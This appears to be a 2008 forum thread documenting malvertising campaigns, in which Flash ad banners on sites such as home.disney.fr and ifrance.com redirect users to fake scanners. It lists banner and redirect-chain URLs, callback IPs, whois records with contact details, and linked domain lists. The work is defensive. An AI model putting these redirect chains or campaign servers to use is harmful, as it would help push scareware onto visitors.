  47. Warner Bros.
  48. Weight Watchers
  49. Yahoo! Personals
  50. Zappos
If the above "customers" list is real, may I suggest EVERYONE checks ALL the creatives received from EOSads !!!
IPB Image

Other Websites.
  1. 123-webdesigner.info
  2. 18teensexy.info
  3. Alice-cms.com
  4. Allmp3online.com
  5. Avtosvoboda.com
  6. Beaufortcomputerclub.org
  7. Benjenonline.com
  8. Betterhere.info
  9. C5jd.info
  10. Computerstoremarket.net
  11. Cuny69.info
  12. Deanhooper.info
  13. Debt-settlement-programs.com
  14. Develareel.com
  15. Develareel.org
  16. Dominicana-tur.com
  17. Dongless.com
  18. Drug-test-assistant.com
  19. Edesignstudio.org
  20. Eosads.com
  21. Freeebayguide.net
  22. Freehotportal.info
  23. Freehotportal.net
  24. Freestuffbest.com
  25. Funphonesdirect.net
  26. Global-financialsmart.com
  27. Globalfinancialsmart.com
  28. Goatweedsite.com
  29. Goldlove69.info
  30. Greatmobilephones.net
  31. Harrymerlot.com
  32. Hellfire.com
  33. Hotadultblogs.info
  34. Hotmaturevids.info
  35. Ilifeinsurance.info
  36. Isf2003.org
  37. Jaghealth.com
  38. Jobpenguin.com
  39. Klikwarez.com
  40. Knowfilter.com
  41. Kxtrlive.com
  42. Lipsmix.com
  43. Malaki.biz
  44. Maturesucking.info
  45. Megaarticles.info
  46. Megacool69.info
  47. Monplaisire.com
  48. Mp3-fiesta-download.com
  49. Musicalequipmentmarket.net
  50. Musicalstoredirect.net
  51. Mypornreel.com
  52. Paidsexvideos.com
  53. Pharma-care4everyone.com
  54. Phentermine375mg.net
  55. Phentermine375noprescription.com
  56. Phenterminewithoutaprescription.net
  57. Pilgrim-worldtour.com
  58. Platinumbank.biz
  59. Pornozoooom.info
  60. Postsalotspeaks.com
  61. Realarchive.info
  62. Rurez.net
  63. Russian-bdsm.info
  64. Tatushki.info
  65. Thriftist.org
  66. Toursleuth.com
  67. Ullikummi.net
  68. Vashotdyh.com
  69. Western-contact.net
  70. Worldphonesdirect.net
  71. Yamatobikes.com
  72. Zippedarticles.com
  73. Zithromaxwithoutprescription.org
  74. Zocorwithoutprescription.com
  75. Zummedia.com
  76. Zylant.com
  77. Aristarh.info
  78. Derbydolls.info
  79. Devde.info
  80. Gagngapeonthebitch.info
  81. Gammaloader.net
  82. Gigantiksurp.info
  83. Glazedbyme.info
  84. Timokratia.info
  85. Trymeout.info
  86. Twinklagoon.com
Kimberly
<h4>
home.disney.fr
</h4>
Two updated CinemaNow malvertizements are present and active on Disney France - website home.disney.fr

Screenshot in situ.
IPB Image
Banner n°1.
openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_MEGA_CINEMA_NOW/cinemanow_728x90.swf
IPB Image
Campaign.
adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650097
xponlinescanner.com/soft.php?aid=024218&d=3&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024218
______________________________

Banner n°2.
openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_SKY_CINEMA_NOW/cinemanow_120x600.swf
IPB Image IPB Image
Campaign.
adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650098
xponlinescanner.com/soft.php?aid=024217&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77024217
______________________________

canonical name oas.mephisto.jmsp.net.
aliases openad.tf1.fr
addresses 212.23.180.17

212.23.180.17 - Jetmultimedia France

The RealMedia creatives are hosted by TF1, so they might show up on other French websites. Caution is adviced.

Note: Special thanks to Malekal_morte who asked for additional details when reported here.

<h4>
Caution
</h4>
A word of caution to those manipulating the SWF files for analysis. The creative reports back to 216.195.62.80 as seen below.
IPB Image
Note: The name of the application has been removed on purpose.

216.195.62.80 is located in the same range as eosads.com (216.195.62.169)

IP Information for 216.195.62.80

OrgName: APS Telecom
OrgID: APSTE
Address: 8130 SW BEAVERTON-HILLSDALE HWY
City: PORTLAND
StateProv: OR
PostalCode: 97225
Country: US
NetRange: 216.195.32.0 - 216.195.63.255
CIDR: 216.195.32.0/19
NetName: APS-EPSI
NetHandle: NET-216-195-32-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.3FN.NET
NameServer: NS2.3FN.NET

Websites.
  1. Adoptserver.info
  2. Articleseasy.info
  3. Bestsporno.info
  4. Burumba.net
  5. Flanp.info
  6. Flatq.info
  7. For-ease.com
  8. Futurecho.com
  9. Itradeport.com
  10. Krevedkoff.com
  11. Kvartirstroy.com
  12. L12.biz
  13. Memberpass.info
  14. Miroor.net
  15. Mirosite.com
  16. Mp3sdir.com
  17. Niobemenendez.com
  18. Penobetons.com
  19. Plagiarism-free-thesis.info
  20. Plusarticles.info
  21. Pointarticles.info
  22. Pornosaitov.net
  23. Rape-reviews.com
  24. Rusexvideo.net
  25. Salearticles.info
  26. Shtukaturko.com
  27. Sipuchka.com
  28. Skaappi.org
  29. Spako-ru.com
  30. Stroyangar.com
  31. Stroydomov.com
  32. Stroyofis.com
  33. Stroysklad.com
  34. Teplodoms.com
  35. Teploizol.com
  36. Thfonline.org
  37. Truthcommissionconference.org
  38. Webflikr.info
  39. Writingblog.biz
Kimberly
<h4>
New banner : Nike
</h4>
Forwarded by a contact.

Banner.
trueffect-cdn.com/20880/728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
track.trackads.net/statsa.php?campaign=20880&u=1213102076650
track.trackads.net/swf/gnida.swf?campaign=20880&u=1213102076650&
paramss=[removed]

track.trackads.net/statss.php?campaign=20880&u=1213102076650&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&bs=1&lang=en
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&lang=en
<h4>
trueffect-cdn.com - 67.205.93.101
</h4>
Website Title: TruEffect delivers next generation online advertising solutions for agencies, advertisers and publishers.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-29
Expires: 2009-05-29
Name Server: NS1.TRUEFFECT-CDN.COM (has 1 domains)
Name Server: NS2.TRUEFFECT-CDN.COM
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Ukraine - Private Customer - Iweb
Dedicated Hosting: trueffect-cdn.com is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: TRUEFFECT-CDN.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Record last updated on 2008-06-01
______________________________

You might notice that the IP of atlas-ads.com; another bad advertiser; is 67.205.93.102, which makes them neighbours.

Just like with atlas-ads.com in the past, don't get fooled when you visit the homepage of trueffect-cdn.com, they don't have a homepage but redirect you to a legit advertising company named TrueEffect Inc. TrueEffect Inc has earned certified status in Microsoft Corp.'s Partner Program on February 12, 2007.
IPB Image
CODE
URL = http://trueffect-cdn.com
UAG = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
AEN =
REQ = GET; VER = 1.1; FMT = AUTO
Sending request:
GET / HTTP/1.1
Host: trueffect-cdn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.101
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·302·Found(CR)(LF)
X-Powered-By:·PHP/5.2.5-3(CR)(LF)
Location:·http://trueffect.com(CR)(LF)
Content-type:·text/html(CR)(LF)
Content-Length:·0(CR)(LF)
Connection:·close(CR)(LF)
Date:·Tue,·10·Jun·2008·14:21:47·GMT(CR)(LF)
Server:·lighttpd/1.5.0(CR)(LF)
(CR)(LF)

<h4>
spywaredestructor.com - 67.205.75.9
</h4>
spywaredestructor.com still has the same IP.

spywaredestructor.com - 67.205.75.9

Website Title: .: SpywareDestructor - the best antispyware ever :. ICANN Registrar: ESTDOMAINS, INC.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-17
Expires: 2009-01-17
Name Server: NS.SPYWAREDESTRUCTOR.COM
Name Server: NS1.US.EDITDNS.NET (has 9,561 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.9
IP Location - Ukraine - Individual

Reverse IP: 2 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: SPYWAREDESTRUCTOR.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Websites.
  1. Antispywaredeluxe.com
  2. pidosoftware.com
  3. Spywaredestructor.com
Kimberly
<h4>
ifrance.com - paysagevirtuel.ifrance.com
</h4>
Curves malvertizement present on personal websites - paysagevirtuel.ifrance.com in this case - hosted on ifrance.com. This is not the first time we had echos about malicious banners being present over there. The creative is hosted on their own website and we see Gemini Internactive at work again. Fuse Kit 2.1.4 has been used in this creative.

Screenshot in situ.
IPB Image
Banner.
image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213

Note: Reported here
Kimberly
<h4>
Ringtones - Updated Campaign
</h4>
Forwarded by a contact.

The ringtones banner has been updated again. Fuse Kit 2.1.4 has been used in this creative and the malvertizement fails the Adopstools test.

Banner.
IPB Image
Campaign.
openadstream.net/ad07.gif?url=[removed]

xp-vista-update.net/?id=34866151134
fastwebway.com/soft.php?aid=011810&d=0&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77011810
<h4>
Caution
</h4>
A word of caution to those manipulating the SWF files for analysis. The creative reports back to 67.210.12.62 as seen below.
IPB Image
Note: The name of the application has been removed on purpose.

openadstream.net - 67.210.12.62

Website Title: None given.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-12
Expires: 2009-01-12
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,902 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

IP Location - Texas - Freeport - Cernel Inc
Dedicated Hosting: openadstream.net is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: OPENADSTREAM.NET

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

<h4>
www.gamerevolution.com
</h4>
A malicious banner *might* still be present on www.gamerevolution.com. All information is highly appreciated.
Kimberly
<h4>
New banner - diamondharmony.com
</h4>
A completely new jewelry malvertizement featuring diamondharmony.com has been forwarded to us by a contact.

Banner.
IPB Image
IPB Image
IPB Image
IPB Image
Associated URL.
adoptserver.info/_stat.gif?url=[removed]
Note: I will post more information about other links if possible after a more complete examination of the banner.

Although many older banners are still present on the web (see below), this creative is part of a new series using Fuse Kit 2.1.4. just like the new curves & ringtones ones.

<h4>
screensavers.com
</h4>
As said earlier, many older advertisements are still present on the web. Screensavers.com is a perfect example of this phenomenon. The alert was given a couple of days ago, the site seems clean now upon first sight but the direct links still work.

Screenshots in situ.
IPB Image
IPB Image
Banner n°1 - ShopAtHomeTV.
c5.zedo.com/OzoDB/j/e/260649/V4/120x600.swf
Campaign.
mysurvey4u.com/crossdomain.xml
mysurvey4u.com/stats.php?campaign=shesmall&u=1212639076765
The campaign is inactive but information is still transmitted to the server.

stats.php
CODE
f(CR)(LF)
stats=620208842(CR)(LF)
0(CR)(LF)
(CR)(LF)
______________________________

Banner n°2 - Traveltray.
c13.zedo.com/OzoDB/n/e/260653/V3/728_INTL.swf
Campaign.
adtraff.com/statsa.php?campaign=l9rge5tx&u=1212640525488
adtraff.com/swf/gnida.swf?campaign=l9rge5tx&u=1212640525488
adtraff.com/statss.php?campaign=l9rge5tx&u=1212640525488
blessedads.com/?cmpid=l9rge5tx&adid=728
prevedmarketing.com/?tmn=mwatmpsmcmp&aid=l9rge5tx&lid=728&ax=1&ed=2&mt_info=4197_1814_16615&rdr=1
scanner2.malware-scan.com/18_swp/?tmn=null&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=&ax=1&ed=2&mt_info=4197_1814_16615:5745_0_16606&rdr=2
bucksbill.com/.stats/refil.php?p=18&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=keyin
Kimberly
<h4>
www.lyricsdownload.com - ringtones
</h4>
2 malicious ringtones banners are present on www.lyricsdownload.com. A couple of days ago we saw the 160x600 updated version of the banner, this time the 728x90 and 300x250 went live. Both are using Fuse Kit 2.1.4 again.

Screenshot in situ.
IPB Image
Banner.
banners.valuead.com/omd/37/63.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803
______________________________

Screenshot in situ.
IPB Image
Banner.
banners.valuead.com/omd/39/62.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804
Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62
Kimberly
<h4>
www.lyricsandsongs.com - ringtones
</h4>
www.lyricsandsongs.com is also showing 2 malicious ringtones banners. Ya even get the 2 for the prize of 1 as seen on the screenshot below. We even see the redirect happen live, notice xponlinescanner.com in the address & status bar.

Screenshot in situ.
IPB Image
Banner n°1.

This is the same banner and campaign as seen on www.lyricsdownload.com earlier today.
banners.valuead.com/omd/37/63.swf
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803
______________________________

Banner n°2.
banners.valuead.com/omd/38/61.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802
Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62
Kimberly
<h4>
www.bigoo.ws - ringtones
</h4>
Never two without three .... www.bigoo.ws, a website with Graphics, Backgrounds, Icons, Pimp my profile stuff for MySpace, Friendster, Hi5 ... etc.

Screenshots in situ.
IPB Image
The culprit ... yep ringtones again. The 160x600 version is also present on the website, I just wasn't fast enough to capture it.
IPB Image
Banners & and campaign are the same as www.lyricsandsongs.com - www.lyricsdownload.com
______________________________

Banner 300x250.
banners.valuead.com/omd/39/62.swf
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804

______________________________

Banner 160x600.
banners.valuead.com/omd/38/61.swf
Campaign.
openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802
Kimberly
<h4>
www.lyricsdownload.com & www.lyricsandsongs.com & www.bigoo.ws
</h4>
Shortly after contacting ValueAd Inc, I received an email saying that their support services and the customers got notified about the problem. Although yesterday the ringtones malvertizement was still being displayed, all 3 sites “seem” clean now.

<h4>
ifrance.com
</h4>
The curves malvertizement is still being displayed at ifrance.com as seen below.
IPB Image
ifrance has been contacted by me and the site owner through their support system. Furthermore, iEUROP has also been notified by me about the problem. Nothing has been done yet, this is again unacceptable. When are ifrance / iEUROP going to realize that a responsible attitude towards their customers and visitors is needed instead of ignoring reports about malware? The same goes for any other advertisers, website owners, hosting companies … .

Do not visit websites hosted on ifrance.com unless you have taken appropriate measures in order to protect yourself. Either block Flash content from being displayed, either block anything coming from image.ifrance.com/img/pub in your ad blocker until further notice.
Kimberly
<h4>
Latest news
</h4>
Shockwave in the news again.

Shockwave exploits

thx to MAD for the heads up.
______________________________

ifrance.

The curves malvert is still up and active, furthermore their services persist remaining silent. MAD made a nice write up about the SWF problem in French with links to different online articles.
iFRANCE, nous avons un problème...
Kimberly
<h4>
ifrance.com is still serving malvertizements
</h4>
On Jun 12 2008, 06:02 PM we first did catch the malicious banner being displayed at websites hosted on ifrance.com. Today, 9 days later, ifrance hasn't replied to any of our notifications. The malvertizement is still redirecting people to xponlinescanner.com, no matter what site hosted at ifrance they visit.
IPB Image
If you have a site hosted at ifrance contact them please, this mess has to be cleaned up. pharmacies-gms.ifrance.com, paysagevirtuel.ifrance.com ... how many other sites are hosted over there? Maybe it should hit the headlines in some newspapers, people are quite keener in responding. We learned that when Yahoo was displaying malverts.
Kimberly
<h4>
ifrance.com - isuisse.com
</h4>
We've got a serious problem going on here. Not only the curves malvertizement is being displayed on ALL websites being hosted on *.ifrance.com but also on *.isuisse.com as reported here today by the site owner of hb9mdl.isuisse.com.
Of course ifrance and iEUROP have been contacted again by several persons, including me.

Note: the forum software is cutting of the direct link, my apologies for that. Copy / paste the line below but be sure to remove the space between & and #
forum.pcastuces.com/probleme_acces_site_internet-f2s13386.htm?page=1& #2862245


Screenshot in situ.
IPB Image
Banner.
image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf
IPB Image
Campaign.
adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213
IPB Image
IPB ImageClick on the image to enlarge
IPB Image
<h4>
iEUROP
</h4>
iEUROP
QUOTE
Figures overview

+ 15 internet portals
+ 22 millions of visitors of all the portals (Origin Mediametrie eStat)
+ 110 millions of visited pages
+ 4 500 000 Members : webmail, websites, blogs…
+ 14 000 clients on paying hosting
iEUROP ACT please !!! - Remove the curves malvertizement from your advertising system.
Kimberly
<h4>
ifrance.com - First Choice banner
</h4>
Seeing is believing … well you have to see this one to believe it actually. A secondary malicious banner is rotating on ifrance. This time it’s the First Choice banner sold by Proximogroup and again hosted on their proper servers. The redirect to waytotheprofit.com is visible in the status bar of Internet Explorer. Website visited: frankyturf.ifrance.com

Screenshot in situ.
IPB Image
The malvertizement is even displayed twice.
IPB Image
Banner.
image.ifrance.com/img/pub/proximogroup/firstchoiceFR_468x60.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
click.adlbrite.com/crossdomain.xml
click.adlbrite.com/c/index.php?id=UHJPazY1m7NkiZ0Rm7NkiZODRNcEYybU1pM1m7NkiZoPTEyMDUzMzQ4ODcmcG56Y252dGE9bmdlcnBlcm5hm7NkiZwYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=atrecreant
The banner is a bit buggy so we keep turning around in circles a little bit hitting waytotheprofit.com while the redirect slowly continues in the background.
prevedmarketing.com/?tmn=mwatmp&aid=atrecreant&lid=&ax=1&ed=2&mt_info=5752_6372_2358&rdr=1
adverdaemon.com/?tmn=mwatmp&aid=atrecreant&lid=&ax=1&ed=[removed]
performanceoptimizer.com/.landing/index.php?[removed]
stats.sellmosoft.net/pos_id_performanceoptimizer/poa_atrecreant_pot103s_fr_en_edpo2/pol_keyin/por_/lp_true/stats.php
IPB Image
<h4>
adverdaemon.com - 76.74.249.30
</h4>
I never did encounter this domain in the redirects before but it did appear and shared its IP with different well known domains as seen first here.

adverdaemon.com - 76.74.249.30

Website Title: None given.
ICANN Registrar: TUCOWS INC.
Created: 2007-04-20
Expires: 2009-04-20
Updated: 2008-04-21

Server Type: lighttpd/1.4.13
IP Address: 76.74.249.30
IP Location - Texas - San Antonio - Serverbeach
Reverse IP: 32 other sites hosted on this server.

Whois Record

Registrant:
Adverdaemon Inc.
271 N Snelling Ave
Saint Paul, MN 55104
US

Domain name: ADVERDAEMON.COM

Administrative Contact:
Hostmaster, Adverdaemon Inc. adverdaemon@yahoo.com
271 N Snelling Ave
Saint Paul, MN 55104
US
(651) 644-4579
Technical Contact:
Hostmaster, Adverdaemon Inc. adverdaemon@yahoo.com
271 N Snelling Ave
Saint Paul, MN 55104
US
(651) 644-4579

Registrar of Record: TUCOWS, INC.
Record last updated on 21-Apr-2008.
Record expires on 20-Apr-2009.
Record created on 20-Apr-2007.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS2.ADVERDAEMON.COM 208.79.82.66
NS3.ADVERDAEMON.COM 77.73.98.2
NS4.ADVERDAEMON.COM 77.73.98.4
NS1.ADVERDAEMON.COM 208.79.82.50

Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
Kimberly
<h4>
www.taringa.net - Car.com banner
</h4>
With the help of a victim of these redirects, I was able to catch the malicious "car.com" banner being displayed at www.taringa.net, a social networking site in Argentina.

Screenshot in situ.
IPB Image
Banner.
g.impresionesweb.com/b/1/6/d/17113.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.

At the time of the write up I didn't get a complete redirect but we all know where we end up ... a fake online scanner.
getfreecar.com/statsa.php?u=1200066806&campaign=weidoneous
______________________________

It's not the first time that Impresiones Web is being caught displaying malvertizements, another malicious banner for an adult site was reported on 7th April 2008.


Note: Special thanks to the victim of this redirect for providing me the necessary information.
Kimberly
<h4>
ifrance / isuisse - malicious banners
</h4>
There is the good news and the bad news ... Form time to time I have been checking back the websites hosted on ifrance and isuisse victim of the redirects caused by 2 different malicious banners.

The good news ... the Curves banner displayed on pharmacies-gms.ifrance.com, paysagevirtuel.ifrance.com, hb9mdl.isuisse.com "seems" to be vanished. I don't have an official confirmation about the banner being put out of circulation as ifrance / iEUROP never gave sign of life. The direct link to the malvertizement is still live.

The bad news ... the First Choice banner is still being displayed at frankyturf.ifrance.com and worst of all, it's now showing up on pharmacies-gms.ifrance.com too.

Adopstools

http://www.adopstools.com/index.asp?page=q...rf54ypoYU5QR77i

Screenshots in situ.
IPB Image
IPB Image
Extreme caution remains thus active and I maintain my adivice to block image.ifrance.com in your firewall, router, adblock software, hosts file ... etc.
Kimberly
<h4>
ifrance - First Choice
</h4>
The First Choice banner is still being displayed at frankyturf.ifrance.com

Network activity.
IPB Image
<h4>
click.adlbrite.com - 217.150.254.46
</h4>
I noticed I never did cover the whois details from click.adlbrite.com present in the First Choice malvertizement.

click.adlbrite.com - 217.150.254.46

Website Title: None given.
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2007-11-26
Expires: 2008-11-26
Updated: 2008-01-28
Registrar Status: clientTransferProhibited
Name Server: NS1.ADLBRITE.COM (has 1 domains)
Name Server: NS2.ADLBRITE.COM
Whois Server: whois.srsplus.com

IP Address: 217.150.254.46
IP Location - Switzerland - Pc Ions Incorporation

Registrant:
Sara Sen (mail@adlbrite.com)
Hight str 45
Baltim, NONE 8232
CL
152656555

Administrative, Technical, Billing Contact:
Sara Sen (mail@adlbrite.com)
Hight str 45
Baltim, NONE 8232
CL
152656555

Domain servers:
ns1.adlbrite.com - 202.75.35.72 - AS17464 TMIDC AP Hosting Services (MYLOCA), Data Services Division, Telekom Malaysia
ns2.adlbrite.com - 58.65.238.170 - AS27595 ATRIVO AS Atrivo

Domain Service Provider:
SoftSolutions Inc

Domains sharing nameservers.
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • googiesindication.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.com
  • stat-diagnostic-imaging.net
  • statetstr.com
  • statgroup.net
  • stathisranch.net
  • stathome.net
  • staticglobalsources.com
  • staticglobalsources.net
  • station-appraisals.com
  • station-appraisals.net
  • statnation.net
  • statsla.net
  • statworld.net
  • thetechnorati.com
  • vozemiliogaranon.com
These are well known domains. - Ref.
Kimberly
<h4>
ifrance.com - a-j.ifrance.com
</h4>
Another malvertizement present on ifrance. This is now the third malicious banner discovered since June the 12th. The creative advertises XM Radio and is hosted on admin.hostadserve.com which is linked to several other bad advertising companies and Mr "Serg Moon".

Site.

a-j.ifrance.com

Screenshot in situ.
IPB Image
Banner.
admin.hostadserve.com/www/images/xm_radio_728_90-8.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
stathisranch.net/c/index.php?id=m7NkiZU5zQ1hCWVNGanVKN055Q01zaXFoPTEyMTQ0ODA4NjYmcG56Y252dGE9bmm7NkiZvbmVlbmdim7NkiZQYNkiDgNmYNkiDgNm

profitabill.com/?cmpid=asbarrator
<h4>
admin.hostadserve.com - 83.96.185.57
</h4>
We stumble on some interesting information here ... and guess who shows up in the whois details?
moon.serg@gmail.com - sounds familiar ain't it ? - Ref.
IPB Image
Domain Name: HOSTADSERVE.COM
Registrar: TLDS, LLC DBA SRSPLUS
Whois Server: whois.srsplus.com
Referral URL: http://www.srsplus.com
Name Server: NS1.HOSTADSERVE.COM
Name Server: NS2.HOSTADSERVE.COM
Status: clientTransferProhibited
Updated Date: 05-jun-2008
Creation Date: 27-may-2008
Expiration Date: 27-may-2009

Queried whois.srsplus.com with "hostadserve.com"...

hostadserve.com

Registrant:
Alex Ferguson (moon.serg@gmail.com)
Rodeo drive 12
Baltimor, NONE 20040
AL
380913064412

Administrative, Technical, Billing Contact:
Alex Ferguson (moon.serg@gmail.com)
Rodeo drive 12
Baltimor, NONE 20040
AL
380913064412

Record created on May 27 2008.
Record expires on May 27 2009.

Domain servers:
ns1.hostadserve.com
ns2.hostadserve.com

Domain Service Provider:
Sagent Group

______________________________

When we visit admin.hostadserve.com, we are redirected to admin.r2d2adverising.com ... r2d2adverising.com is a well known bad advertising company.

CODE
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 02 Jul 2008 17:52:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.5
Location: http://admin.r2d2adverising.com/www/admin/index.php
IPB Image
______________________________

hostadserve.com - 76.74.249.30

hostadserve.com serves a 404 error and resolves to luckyadsols.com, another bad advertising company. hostadserve.com has also been registered by Alex Ferguson - aka Mr Moon - moon.serg@gmail.com

Website Title: 404 - Not Found
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-05-27
Expires: 2009-05-27
Updated: 2008-06-05
Name Server: NS1.HOSTADSERVE.COM (has 2 domains)
Name Server: NS2.HOSTADSERVE.COM
Whois Server: whois.srsplus.com

IP Address: 76.74.249.30
IP Location - Bvi - Tortola - Soft.sol.inc

Here we go again ...
"Alex Ferguson" owns about 32 other domains.
moon.serg@gmail.com is associated with about 103 domains.
Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
If you have been approached by people representing admin.hostadserve.com, hostadserve.com or any related domain, check your creatives please.
Kimberly
<h4>
Alert ...
</h4>
From: Alert: recurring malvertizements at ifrance.com (and isuisse.com)

Heck, let's also pay close attention to ibelgique.com, iespana.es, iitalia.com and iquebec.com, all of which are closely related to ifrance.com and isuisse.com (also subject to guilt by association).
As expected ... pay attention to ANYTHING related.

joedzina.iquebec.com
IPB Image
IPB Image

nyssa.model.ibelgique.com
IPB Image
IPB Image
